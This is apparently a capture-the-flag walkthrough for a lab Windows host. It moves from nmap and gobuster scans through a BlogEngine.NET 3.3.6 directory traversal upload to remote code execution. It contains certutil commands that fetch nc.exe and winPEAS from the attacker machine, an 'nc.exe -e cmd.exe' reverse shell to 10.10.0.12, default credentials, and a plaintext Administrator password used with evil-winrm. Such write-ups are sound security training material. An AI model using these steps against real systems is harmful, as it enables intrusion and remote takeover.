nmap -A -p- -oA engine 172.31.1.16 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA engine 172.31.1.16

nmap -sU -O -p- -oA engine-udp 172.31.1.16

nikto -h 172.31.1.16:80

gobuster dir -k -u http://172.31.1.16/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100


We log in to the BlogEngine admin panel with the default credentials admin:admin.


The installation reports BlogEngine.NET version 3.3.6.


We search searchsploit for exploits matching blogengine 3.3.6 (-w prints the exploit-db URLs instead of local paths):

searchsploit blogengine -w

We open entry 46353 (BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution).

We copy the exploit code into a file named PostView.ascx and change the IP (and port) in the code to those of the Kali machine, then start a listener on that port:


We go to http://172.31.1.16/admin/app/editor/editpost.cshtml and upload PostView.ascx through the editor's file manager (uploaded files are stored under App_Data/files).


We then browse to http://172.31.1.16/blog?theme=../../App_Data/files. The unsanitized theme parameter walks out of the themes directory, so BlogEngine loads our uploaded PostView.ascx as the post view and the reverse shell connects back to the listener.


On Kali, serve nc.exe over HTTP and fetch it from the shell on the target with certutil:

python3 -m http.server 8888

certutil -urlcache -split -f http://10.10.0.12:8888/nc.exe nc.exe


Start the listener on Kali first, then launch nc.exe in the background on the target to get a more stable shell:

nc -lvnp 3333

start /b nc.exe -e cmd.exe 10.10.0.12 3333


Transfer winPEAS the same way for local enumeration:

python3 -m http.server 8888

certutil -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe


Running winPEAS reveals Administrator credentials, which we use to log in over WinRM:


evil-winrm -i 172.31.1.16 -u Administrator -p PzCEKhvj6gQMk7kA


copyright©2022 Cu3rv0x all rights reserved